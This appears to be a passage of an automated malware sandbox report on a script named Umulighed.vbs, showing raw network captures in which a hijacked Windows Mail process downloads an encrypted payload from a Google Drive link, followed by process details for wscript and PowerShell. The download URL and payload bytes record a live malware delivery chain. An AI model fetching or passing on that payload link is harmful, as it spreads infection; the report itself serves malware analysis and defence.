                                                                            Data Ascii: Ekv1Eu7XKxIEvi08Nq5NPjLXyA88z/7k5F1EFLHrTNAcBvkTOJss/47YEQNIPto8QKoJ14bYUSK78ZVjaWKOaTUYuw0M0wBRymik4oMkqUIMYjPRl6p/MVFRS6l3ox01MFJZtVtOUCrNjudT+LVVIWTaeUYO2BEItHgua66RumhulRgobpUYKG6VGChulRgobpUYKG6VGChulRgoc5LE2YibyhOhZ1JWfB23Xh2XzVs5cmDh2uEw5XLUm3QmcXB
                                                                            2024-04-24 08:12:01 UTC1255INData Raw: 31 5a 5a 50 66 6c 66 4a 49 46 51 41 5a 64 32 36 31 5a 5a 75 66 4e 52 64 39 7a 48 68 77 71 43 36 56 44 49 62 5a 65 44 52 5a 54 75 6d 5a 48 2f 56 55 2b 46 6a 47 47 39 43 6e 54 4e 47 42 49 76 2f 4b 44 32 71 2f 53 32 6c 2f 35 51 6f 64 54 78 4f 2b 4b 4b 2f 72 51 2f 37 45 36 44 4a 50 46 66 50 58 79 4e 39 51 54 34 5a 4b 73 61 64 48 57 64 49 4b 4d 54 55 42 4a 6b 43 2b 7a 50 68 4a 61 4f 36 56 4e 34 4c 4f 46 75 74 49 46 51 30 62 6f 78 36 41 74 36 4a 72 4e 4d 63 49 45 79 31 70 6e 49 68 31 5a 59 4c 7a 45 49 66 49 48 7a 4a 4f 68 7a 64 42 2f 77 6f 57 56 31 54 50 49 4b 66 46 37 79 58 2b 34 6c 72 4c 56 37 78 6e 78 6d 71 36 73 73 67 50 56 48 48 6e 77 5a 52 71 69 37 6e 71 7a 4b 43 38 6f 6c 50 53 75 59 62 30 61 57 37 68 31 7a 46 63 78 76 67 6a 44 7a 62 78 62 42 38 2f 34 4d
                                                                            Data Ascii: 1ZZPflfJIFQAZd261ZZufNRd9zHhwqC6VDIbZeDRZTumZH/VU+FjGG9CnTNGBIv/KD2q/S2l/5QodTxO+KK/rQ/7E6DJPFfPXyN9QT4ZKsadHWdIKMTUBJkC+zPhJaO6VN4LOFutIFQ0box6At6JrNMcIEy1pnIh1ZYLzEIfIHzJOhzdB/woWV1TPIKfF7yX+4lrLV7xnxmq6ssgPVHHnwZRqi7nqzKC8olPSuYb0aW7h1zFcxvgjDzbxbB8/4M
                                                                            2024-04-24 08:12:01 UTC1255INData Raw: 6e 78 36 63 31 61 6d 54 67 51 74 4b 63 44 73 44 46 36 4f 35 51 4f 32 37 54 47 2f 36 75 55 39 38 53 37 31 56 68 31 6a 75 5a 4e 4f 65 45 4b 72 79 2b 65 4c 35 55 4d 78 6f 69 61 50 79 6f 4f 35 66 74 6c 49 36 4c 34 55 6f 6f 4e 62 42 4a 4d 32 65 31 47 70 42 54 76 6e 31 52 35 39 44 6c 2b 6a 2b 51 59 2b 4a 58 4d 32 4c 4c 64 71 30 51 55 6b 30 67 65 2b 34 69 48 59 50 4f 4a 52 6f 5a 49 42 39 72 55 2f 32 46 55 61 63 7a 43 61 56 36 39 69 51 76 61 4f 47 39 46 61 57 36 56 4b 78 42 66 76 52 45 62 70 32 63 38 4b 5a 66 42 6c 51 33 53 33 32 59 6a 75 46 73 61 6f 4e 46 44 74 77 2b 6a 37 72 4c 6f 74 7a 4c 65 4d 75 61 48 6b 6b 6f 77 36 53 52 75 32 61 67 30 46 37 7a 44 31 46 7a 4d 39 6b 77 6f 37 70 55 4d 42 6b 77 6c 58 4b 6f 6c 78 4e 6c 32 34 6c 68 56 44 54 74 32 31 58 57 6b 70
                                                                            Data Ascii: nx6c1amTgQtKcDsDF6O5QO27TG/6uU98S71Vh1juZNOeEKry+eL5UMxoiaPyoO5ftlI6L4UooNbBJM2e1GpBTvn1R59Dl+j+QY+JXM2LLdq0QUk0ge+4iHYPOJRoZIB9rU/2FUaczCaV69iQvaOG9FaW6VKxBfvREbp2c8KZfBlQ3S32YjuFsaoNFDtw+j7rLotzLeMuaHkkow6SRu2ag0F7zD1FzM9kwo7pUMBkwlXKolxNl24lhVDTt21XWkp
                                                                            2024-04-24 08:12:01 UTC1255INData Raw: 6e 31 31 5a 50 34 79 52 47 4e 49 46 48 77 30 6c 74 58 31 61 4d 47 4e 4c 6b 72 38 67 46 4b 6c 45 62 5a 31 5a 4d 4b 50 6b 63 39 49 45 6e 49 65 52 67 72 31 5a 50 62 50 31 79 6a 49 46 45 48 69 2b 54 57 41 2f 77 6f 58 56 31 2f 50 44 36 66 47 71 51 6b 53 62 6f 74 6c 78 63 46 51 51 59 56 44 57 71 56 48 32 43 52 6a 58 36 59 39 4d 65 4b 41 4a 4d 6a 54 6e 43 50 64 53 47 6d 31 6d 71 6d 4d 78 70 2b 4a 38 44 2b 76 31 62 63 58 4f 69 6b 37 77 63 2b 73 6a 2b 5a 63 67 38 7a 4b 69 64 46 59 71 47 36 57 31 43 4c 76 56 52 67 6f 62 70 55 59 4b 47 36 56 47 43 68 75 6c 52 67 6f 62 70 55 59 4b 47 36 56 47 43 68 75 6c 52 67 6f 62 70 55 43 72 2f 51 4a 56 70 68 7a 48 5a 75 6e 4d 7a 45 47 6a 74 46 77 66 69 68 75 6c 51 78 47 4c 44 36 70 57 41 37 76 65 55 70 61 72 72 68 59 48 43 38 61
                                                                            Data Ascii: n11ZP4yRGNIFHw0ltX1aMGNLkr8gFKlEbZ1ZMKPkc9IEnIeRgr1ZPbP1yjIFEHi+TWA/woXV1/PD6fGqQkSbotlxcFQQYVDWqVH2CRjX6Y9MeKAJMjTnCPdSGm1mqmMxp+J8D+v1bcXOik7wc+sj+Zcg8zKidFYqG6W1CLvVRgobpUYKG6VGChulRgobpUYKG6VGChulRgobpUCr/QJVphzHZunMzEGjtFwfihulQxGLD6pWA7veUparrhYHC8a


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.449737142.251.2.1014435440C:\Program Files (x86)\Windows Mail\wab.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-04-24 08:12:27 UTC216OUTGET /uc?export=download&id=1RpbgeefCbfe4fi32TLrpBFNby3_b7V9N HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                            Host: drive.google.com
                                                                            Cache-Control: no-cache
                                                                            2024-04-24 08:12:28 UTC1582INHTTP/1.1 303 See Other
                                                                            Content-Type: application/binary
                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                            Date: Wed, 24 Apr 2024 08:12:27 GMT
                                                                            Location: https://drive.usercontent.google.com/download?id=1RpbgeefCbfe4fi32TLrpBFNby3_b7V9N&export=download
                                                                            Strict-Transport-Security: max-age=31536000
                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                            Content-Security-Policy: script-src 'nonce-30M_gjkuX7DjOoycIIsOUg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                            Server: ESF
                                                                            Content-Length: 0
                                                                            X-XSS-Protection: 0
                                                                            X-Frame-Options: SAMEORIGIN
                                                                            X-Content-Type-Options: nosniff
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.449738142.251.2.1324435440C:\Program Files (x86)\Windows Mail\wab.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-04-24 08:12:28 UTC258OUTGET /download?id=1RpbgeefCbfe4fi32TLrpBFNby3_b7V9N&export=download HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                            Cache-Control: no-cache
                                                                            Host: drive.usercontent.google.com
                                                                            Connection: Keep-Alive
                                                                            2024-04-24 08:12:29 UTC4746INHTTP/1.1 200 OK
                                                                            X-GUploader-UploadID: ABPtcPpN6gkaG6j_jUnYQ36YIQnJi3vkVHUksuUU22yFD2_wmXrXGrkGAY4-DpUO5Hg8ehTku88
                                                                            Content-Type: application/octet-stream
                                                                            Content-Security-Policy: sandbox
                                                                            Content-Security-Policy: default-src 'none'
                                                                            Content-Security-Policy: frame-ancestors 'none'
                                                                            X-Content-Security-Policy: sandbox
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Cross-Origin-Embedder-Policy: require-corp
                                                                            Cross-Origin-Resource-Policy: same-site
                                                                            X-Content-Type-Options: nosniff
                                                                            Content-Disposition: attachment; filename="LPHiQUz214.bin"
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Credentials: false
                                                                            Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt
                                                                            Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                            Accept-Ranges: bytes
                                                                            Content-Length: 244800
                                                                            Last-Modified: Wed, 24 Apr 2024 00:55:57 GMT
                                                                            Date: Wed, 24 Apr 2024 08:12:29 GMT
                                                                            Expires: Wed, 24 Apr 2024 08:12:29 GMT
                                                                            Cache-Control: private, max-age=0
                                                                            X-Goog-Hash: crc32c=hrj4Xw==
                                                                            Server: UploadServer
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Connection: close
                                                                            2024-04-24 08:12:29 UTC4746INData Raw: 65 f1 b1 81 b8 5d 59 f3 2a 05 88 50 eb 4b c5 04 ac ea d0 96 44 c4 cd cf e9 19 2a 75 c8 43 97 80 52 8c ec ab f1 94 17 11 4e 33 24 66 4e c9 38 75 2e f2 1f 4b cf a4 b0 0b f9 70 eb f7 e4 25 dc 85 ab 26 7c c6 fa 1c 27 7a 3e 3e e2 f0 a6 af 04 d1 2c 4b 16 6d 6d 08 ec 8d 6b c7 a1 7a cd fe db 35 1e 79 ca a9 b7 09 02 d7 ee 3d 03 fe 5d 8e 32 f4 54 dd c1 28 96 6b 6a 52 f3 1a ff db b6 ed bc c9 59 17 1d ed 94 0f 36 cc 3e 68 51 a7 8f 93 60 b3 46 81 d5 a9 7f 69 d3 24 ee b0 cd 08 25 80 a2 ef 6b 06 e0 51 62 34 b4 23 4b e5 48 25 18 02 e3 7a 4a ab 92 a4 11 74 57 6b 80 13 fb 41 78 fa f2 4d a5 f3 8c d3 1b 03 ce ec 0d 1c 77 0a 38 27 61 3d 51 fa 02 90 f2 1d 8d 07 1c c9 34 e5 1d f8 d2 b4 26 f4 99 08 66 06 0a fd 96 79 d9 3d a1 1f 6e db 57 c5 89 ba 2e 48 28 16 56 46 e7 a5 e1 78 06
                                                                            Data Ascii: e]Y*PKD*uCRN3$fN8u.Kp%&|'z>>,Kmmkz5y=]2T(kjRY6>hQ`Fi$%kQb4#KH%zJtWkAxMw8'a=Q4&fy=nW.H(VFx
                                                                            2024-04-24 08:12:29 UTC4746INData Raw: 10 62 da 98 6e bf 93 77 d0 96 ef 8e 7c 91 1f 4a 64 59 21 5c 45 ad a9 a0 06 ff aa 94 a4 09 c5 cf 99 ff 4b 0e d5 b4 5b 98 be fd 3e 33 bd 26 8b 04 04 a5 1f 56 a5 b6 52 0c b8 f2 30 4d 4c ab f4 86 f9 3e b8 5a 03 fb bd 8d 59 72 29 9e b4 9d 6f 02 83 ee cc b4 10 23 90 b9 8d 16 d0 ae 50 34 e4 17 6d ab 51 83 a2 62 a0 ea 9a 69 16 9e 85 da 45 d8 1b 5d 69 10 c1 0b 38 24 bd 36 f8 b5 a5 15 c5 d7 21 68 8f 96 60 5d a2 2a 4a 7c 0d 7e c5 1a 60 43 7d 56 f8 bb 70 6b d2 df cc d2 7d 7b ec 77 a9 53 a6 33 5e 71 11 38 f1 df 9f 26 5b 0b d7 d4 36 cf 08 c0 59 1b f8 cb c6 4f d0 61 cc 35 da a5 bf 6e 74 9b 8e f1 bb 88 e1 38 ae 5b 08 0d 69 c7 9f 2c 7d b0 ca dd f2 ca f0 4c 81 f2 a6 35 32 5e ad 74 d1 f0 33 ae 33 24 29 8b a5 22 9c 89 ac 07 1d b5 19 b2 18 86 e8 31 2c 41 25 97 c5 57 fa 88 ff
                                                                            Data Ascii: bnw|JdY!\EK[>3&VR0ML>ZYr)o#P4mQbiE]i8$6!h`]*J|~`C}Vpk}{wS3^q8&[6YOa5nt8[i,}L52^t33$)"1,A%W
                                                                            2024-04-24 08:12:29 UTC460INData Raw: e6 00 61 d7 b0 52 6e 81 19 fe 58 c8 8c 7f a0 4d 33 8b 91 69 bc dc 6d cd df fd 48 00 ca 9e 26 68 30 73 34 da 61 0b ed d8 69 4f e7 88 9f d9 63 0f fe 90 0e 8f 40 5f a9 c0 29 0b 3d 08 3b 28 79 27 ad 06 8a e7 70 db ca 31 69 76 6d 66 42 fd 63 08 ef 92 a6 e5 67 e3 f3 a0 e5 5e 90 5b c1 ee 55 28 86 8b 09 9b d0 27 f7 76 c7 71 33 1e 45 d3 8f b9 4a c4 6a db fa 3e 0a 12 bb 4c 47 07 8f cc 60 39 b5 11 34 89 08 35 19 83 e0 e0 57 b4 1f 3b e8 f2 a1 e4 0e bf 26 46 87 de 33 23 70 66 d6 7f 36 7d 4b 9e b3 e5 f7 0f ba 7e 3c f9 04 7a 71 14 69 88 78 fa d4 8c 37 d4 ab bc c0 1b e4 ea c6 b0 76 57 ad 26 e7 f3 1a f2 60 bb c6 5e 2c 66 55 e5 5b 8b 2f fa 6d 27 d8 e9 86 21 0a 44 4e 33 90 aa 6a 41 fb a1 01 75 a0 d4 cf 3c 54 b7 e8 9c 66 ee 52 c2 d2 0e 22 c8 fe 31 f8 ee 37 28 6f fc bd 2d 65
                                                                            Data Ascii: aRnXM3imH&h0s4aiOc@_)=;(y'p1ivmfBcg^[U('vq3EJj>LG`945W;&F3#pf6}K~<zqix7vW&`^,fU[/m'!DN3jAu<TfR"17(o-e
                                                                            2024-04-24 08:12:29 UTC1255INData Raw: 23 6e bc db 4b d0 ae 56 2c 9b 15 6d ab 8f 99 a2 62 a0 ea 98 65 16 be 79 d6 49 d8 c5 59 50 1e c1 f5 39 35 a7 36 f8 b3 7b 1a c6 d7 09 d5 81 96 6a a3 52 2c 4a 5c 2b 7f c5 1a 9e b3 70 6f f6 45 7c 67 fa f7 c0 d2 7b 5b 10 76 90 48 58 3d 5e 8f 1d c2 fd f7 db 06 5f 01 5b 92 c8 ce 30 30 57 1b f8 c3 dd 4f d0 6b 12 3e d6 a5 bf 6e 76 97 8e d1 48 84 e1 38 70 5a 31 03 69 39 9e 2d 74 b2 ca dd d2 e4 f1 4c 81 0c 56 37 32 5e 53 86 d1 f0 13 99 3e 24 29 75 5a 1a ab 8c ac 07 25 69 1d b2 18 a6 c8 02 d2 be 24 b3 da 67 fc 76 a0 37 5c 31 c5 f2 98 94 a0 4b 2e 81 6f 13 b1 c5 15 9b 5e 19 7e e9 97 73 66 fc 6a 78 42 4d cf 8a d4 47 41 b0 b0 d7 cf 30 06 3c f9 d3 d9 97 62 e6 0a 08 05 21 af 90 2f 44 cc c3 97 c8 4a e4 a6 f9 68 50 40 6c a6 e0 89 0f 4a d3 fb 88 7d a1 03 3c da ac b3 cf 6c 42
                                                                            Data Ascii: #nKV,mbeyIYP956{jR,J\+poE|g{[vHX=^_[00WOk>nvH8pZ1i9-tLV72^S>$)uZ%i$gv7\1K.o^~sfjxBMGA0<b!/DJhP@lJ}<lB
                                                                            2024-04-24 08:12:29 UTC68INData Raw: 0a 00 56 cd 72 8f a0 49 33 0b ba 65 bc f8 98 c1 da fd d9 58 f3 85 2c 96 3c 89 38 b1 3b 23 d3 d2 b4 43 6b c9 9f ff bf f1 f0 90 0e d1 6e 5f a9 c4 ff fe 30 08 3d fc 75 2b ad 67 e1 e7 70 db 34 30 50 ad 6d 66
                                                                            Data Ascii: VrI3eX,<8;#Ckn_0=u+gp40Pmf
                                                                            2024-04-24 08:12:29 UTC1255INData Raw: 42 43 9f 0b ef c9 87 f5 67 e5 f3 5e eb 53 90 5b 3e e2 59 28 a6 f6 08 9b d0 d6 f6 4f e7 ff 32 1e bb d9 8e b9 25 fa 6a db f1 4c d8 11 bb fa 28 47 8f d7 6b c7 bb f2 35 a9 0b 33 19 83 1e ef 5b b4 1e c5 e4 fe a1 23 1a bf 26 d7 79 df 0a 55 72 66 d6 41 9a 7e 4b 9f 93 f3 f6 1c 8a 82 32 a7 04 7a 8f 19 65 88 49 c2 d4 8c 37 2a 54 8b e0 1b dc db 38 bc 72 57 83 22 e7 f3 3b da 58 bb c6 aa 05 66 5f e5 51 75 21 da 6c 07 c1 e9 78 2f f4 4a 42 cd 9c 54 66 6d fa 81 07 75 5e d5 08 38 6d f1 e8 a4 63 10 5e c8 ea 81 d0 37 01 19 28 10 c8 d1 f1 02 b4 2d c2 55 ff 97 37 53 0b 41 0f d3 01 da c6 67 63 5b d9 88 fe 14 7d a7 a7 2a cd 84 50 09 c8 a3 82 1c dc a7 65 1b 07 14 8c 18 f1 12 58 e0 3f 10 99 20 53 27 c9 42 38 d3 a7 c2 83 49 8b 2d 61 0f ef 48 01 3f 17 33 1c 41 45 8d 3e 2c b2 60 91
                                                                            Data Ascii: BCg^S[>Y(O2%jL(Gk53[#&yUrfA~K2zeI7*T8rW";Xf_Qu!lx/JBTfmu^8mc^7(-U7SAgc[}*PeX? S'B8I-aH?3AE>,`
                                                                            2024-04-24 08:12:29 UTC1255INData Raw: 40 b2 73 0a 22 7e 96 4a 36 5f a4 46 67 ce c2 7d 89 2c 80 67 5a 75 ed f2 a4 c0 7e 50 21 6e 3b db 22 f8 74 48 71 2e 00 36 62 87 35 10 72 04 73 cb 89 ab e5 07 d1 11 14 19 b6 90 0b 44 a0 d5 64 cf 72 c0 22 64 de ed 12 40 23 2e e2 a4 03 dc ab 2c c6 10 11 d1 b9 14 f9 2e 4c c4 81 cc 3a ec fd 25 72 4c a4 88 29 2a e9 e8 fe ce 98 96 81 da 1a 6c d5 06 5a b9 45 8f f4 f2 bb c9 ee f6 7d bf d8 dd ab 77 d8 f0 b6 67 6a ef 05 7e 8e 79 1a 4d f9 87 be b3 d2 29 c9 00 fe 8e d9 79 56 91 87 a4 58 f1 f8 79 5c 6f 9d 9d 8a ee a5 26 ca 8c 36 10 7a 59 22 6b 49 d8 ae 18 14 f6 07 8c 99 cd 04 f1 29 1c df 00 95 0a 8c 44 35 46 74 b0 da 8d f8 86 8d ca ea 66 8d ff 37 b3 d2 d8 9b 1d 25 a3 54 bb 61 9a 70 43 70 0b bd 98 d0 0b 00 02 42 fe 56 2c f2 7c be 4d 3b 66 02 72 57 16 c1 d7 aa 9b 83 fd 59
                                                                            Data Ascii: @s"~J6_Fg},gZu~P!n;"tHq.6b5rsDdr"d@#.,.L:%rL)*lZE}wgj~yM)yVXy\o&6zY"kI)D5Ftf7%TapCpBV,|M;frWY
                                                                            2024-04-24 08:12:29 UTC1255INData Raw: 08 a7 1d 98 bd 3f 6e 71 d0 50 e1 78 21 cb 24 d0 2f e6 d9 0d 06 4a 5a 89 dd d4 62 44 ee cc 7e 13 20 82 5b 6a 46 c1 47 b7 ac 26 05 5c 4d 9a 7a 24 c4 f6 c1 c1 77 5d 61 a4 ed f7 46 78 da f2 4d f5 b6 72 d2 6e 08 cd ec 50 66 48 6d 38 27 61 c3 5f fd 02 90 ec 11 88 06 37 cb 3f e5 1d b4 d0 8d 23 fc 99 08 5e 03 0a fd 88 90 7a c0 5e c0 90 d7 53 25 a0 ba 6f 34 68 16 54 66 e7 a5 80 7a 06 e2 94 45 d3 6d f1 2d 0a 03 59 6f 82 9b 60 2a ee ba 07 83 45 d4 52 8f 4b bd 62 01 52 a8 55 d7 b3 53 5f 81 dd 57 bc b9 8f 7a 7c 58 65 43 2a 94 76 c9 bb d8 6a 28 96 83 aa f8 c7 e9 69 a4 e2 5c 80 eb d7 d0 22 48 2e 13 9b 19 e5 89 eb fb 90 ca b7 ba 04 c6 95 20 dc 67 22 ce d0 f6 29 b9 ce 0b 6a fc 08 d4 a2 9c 8e 90 d6 dd ef 3e 06 f2 00 62 5c e9 6e 72 71 6f e4 69 ec a8 8d 1a c9 9f d6 55 b7 d9
                                                                            Data Ascii: ?nqPx!$/JZbD~ [jFG&\Mz$w]aFxMrnPfHm8'a_7?#^z^S%o4hTfzEm-Yo`*ERKbRUS_Wz|XeC*vj(i\"H. g")j>b\nrqoiU
                                                                            2024-04-24 08:12:29 UTC1255INData Raw: 63 56 54 0c b8 d2 c5 43 4f ab 0a 76 f5 3d b8 84 0c fb bd ad ae 73 10 81 4a 9c 56 ef 8f ef cc 34 1b 22 90 95 91 45 d0 a4 22 00 ee 17 6f 55 a1 8f a2 42 a4 14 96 69 e8 b0 84 da 45 26 e9 5f 50 3e c5 0b 38 0c 4f 37 c1 90 85 16 c5 29 28 96 81 ea 04 5d 5c 22 b4 70 2f 7f 3b 16 61 bd 54 6c f6 bb 5b 95 f4 d7 ce f2 7e 5b ee 77 57 5d 5b 3d 5e 8f 1d c5 fd ff 9f 06 5f 0b 29 d5 f1 c4 31 ce 59 1b d8 e2 d2 4f d0 95 e2 33 da a5 41 9c 79 9b ae f7 45 84 e1 c6 8f 62 0d 0d 69 39 a6 10 77 b0 ca e5 04 14 0e b3 ab f2 58 3b 21 6e a9 8a 9a f2 33 8e 2e 24 29 9a 7b 23 a5 8c ac f9 13 8e 1c 8a 05 84 d0 02 d2 40 d6 be d6 47 f8 88 ac 3b a2 10 ea fc 98 94 5e 72 1b a3 6f 13 91 3e 19 9f 5e 37 37 ea 97 72 b0 c8 69 78 68 6e f6 8a d4 b3 be 87 90 d7 ef 27 f8 35 f9 2d ac ff 62 e6 f0 fa 04 20 8f
                                                                            Data Ascii: cVTCOv=sJV4"E"oUBiE&_P>8O7)(]\"p/;aTl[~[wW][=^_)1YO3AyEbi9wX;!n3.$){#@G;^ro>^77rixhn'5-b
                                                                            2024-04-24 08:12:29 UTC1255INData Raw: c0 1e 53 ee fb 5e 06 48 f0 5e 50 52 af 7f b8 7b b3 91 28 ac 23 d1 aa 1a c5 c6 01 60 29 be ac 60 a1 0a fe a6 c4 72 71 8c 4c 33 75 9d 9b bd c5 63 cd df fd 8e 04 f3 85 26 50 fa 72 c7 21 9f 2a d3 d8 12 23 6b c9 9b a7 13 f1 f0 9a 26 da 4c 5f a3 f9 d8 05 31 08 c5 df 75 2b d6 40 85 e7 74 f3 0a 30 50 7e 4b bb 48 c5 9f 0b 11 9b 86 f5 4f 95 f3 5e e1 8e ba 5b 3e f2 59 28 a4 89 4d 9b fc a9 f6 45 e7 71 33 1e b8 ef 8d b9 89 fb 6a db f0 4c d8 11 b9 4f 3b 47 8f c6 17 b2 bb 13 30 ab 79 0e 1b 83 6e 93 21 b4 1f c1 e6 d6 b2 c4 1b b5 24 35 4a df 0a 2b 0d 17 d6 47 9e 7c 30 ef 93 f3 f3 0d 44 86 6a f5 04 7c fc 58 65 88 5e 8d e0 8c 37 2c d4 95 e0 1b e0 c6 15 be 01 31 7d 2e e1 8e 69 da 58 bf c4 2f 76 5f 55 e1 53 8b 27 a0 6d 07 c7 9a ed 21 f4 4c 2d 57 90 54 60 4f 80 f3 07 75 a4 bb
                                                                            Data Ascii: S^H^PR{(#`)`rqL3uc&Pr!*#k&L_1u+@t0P~KHO^[>Y(MEq3jLO;G0yn!$5J+G|0Dj|Xe^7,1}.iX/v_US'm!L-WT`Ou


                                                                            Statistics

                                                                            CPU Usage

                                                                            Click to jump to process

                                                                            Memory Usage

                                                                            Click to jump to process

                                                                            High Level Behavior Distribution

                                                                            Click to dive into process behavior distribution

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            General

                                                                            Target ID:0
                                                                            Start time:10:11:55
                                                                            Start date:24/04/2024
                                                                            Path:C:\Windows\System32\wscript.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Umulighed.vbs"
                                                                            Imagebase:0x7ff7ea7a0000
                                                                            File size:170'496 bytes
                                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:1
                                                                            Start time:10:11:55
                                                                            Start date:24/04/2024
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
